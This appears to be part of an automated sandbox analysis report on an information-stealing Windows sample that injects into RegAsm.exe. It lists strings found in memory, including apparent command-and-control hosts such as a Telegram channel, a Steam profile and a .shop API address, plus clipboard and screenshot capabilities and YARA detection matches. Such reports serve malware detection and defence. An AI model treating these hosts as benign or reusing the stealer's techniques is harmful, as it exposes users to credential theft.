Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134269337.000000001D4AD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFIDH.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: AKFIDH.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AKFIDH.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AKFIDH.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AKFIDH.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GHJKJD.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EBKJDB.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: JEGHJD.2.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunl
Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000104D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/api
Source: RegAsm.exe, 00000009.00000002.2376623871.000000000102E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://traineiwnqo.shop/apibu
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AKFIDH.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	String found in binary or memory: https://www.entrust.net/rpa0
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AKFIDH.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: EBKJDB.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00431530

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00431530

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_0040FF05

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

.NET source code contains very large array initializations

Source: file.exe, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: KKJEBAAECB.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 308224
Source: KJKJJJECFI.exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 176128

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C12B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B8C0 rand_s,NtQueryVirtualMemory,	2_2_6C12B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	2_2_6C12B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C0CF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013E0B44	0_2_013E0B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419CF9	2_2_00419CF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00419333	2_2_00419333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00417F83	2_2_00417F83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0C35A0	2_2_6C0C35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C105C10	2_2_6C105C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C112C10	2_2_6C112C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13AC00	2_2_6C13AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13542B	2_2_6C13542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D5440	2_2_6C0D5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13545C	2_2_6C13545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D6C80	2_2_6C0D6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1234A0	2_2_6C1234A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12C4A0	2_2_6C12C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D64C0	2_2_6C0D64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0ED4D0	2_2_6C0ED4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C106CF0	2_2_6C106CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CD4E0	2_2_6C0CD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DFD00	2_2_6C0DFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F0512	2_2_6C0F0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EED10	2_2_6C0EED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C100DD0	2_2_6C100DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1285F0	2_2_6C1285F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C107E10	2_2_6C107E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C115600	2_2_6C115600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C129E30	2_2_6C129E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C103E50	2_2_6C103E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E4640	2_2_6C0E4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E9E50	2_2_6C0E9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C112E4E	2_2_6C112E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C136E63	2_2_6C136E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CC670	2_2_6C0CC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C12E680	2_2_6C12E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E5E90	2_2_6C0E5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C124EA0	2_2_6C124EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1376E3	2_2_6C1376E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CBEF0	2_2_6C0CBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DFEF0	2_2_6C0DFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C107710	2_2_6C107710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D9F00	2_2_6C0D9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1177A0	2_2_6C1177A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CDFE0	2_2_6C0CDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F6FF0	2_2_6C0F6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0D7810	2_2_6C0D7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10B820	2_2_6C10B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C114820	2_2_6C114820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0E8850	2_2_6C0E8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0ED850	2_2_6C0ED850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C10F070	2_2_6C10F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0F60A0	2_2_6C0F60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1350C7	2_2_6C1350C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EC0E0	2_2_6C0EC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1058E0	2_2_6C1058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0EA940	2_2_6C0EA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C11B970	2_2_6C11B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13B170	2_2_6C13B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0DD960	2_2_6C0DD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C105190	2_2_6C105190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C122990	2_2_6C122990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0CC9A0	2_2_6C0CC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C0FD9B0	2_2_6C0FD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C109A60	2_2_6C109A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C13BA90	2_2_6C13BA90
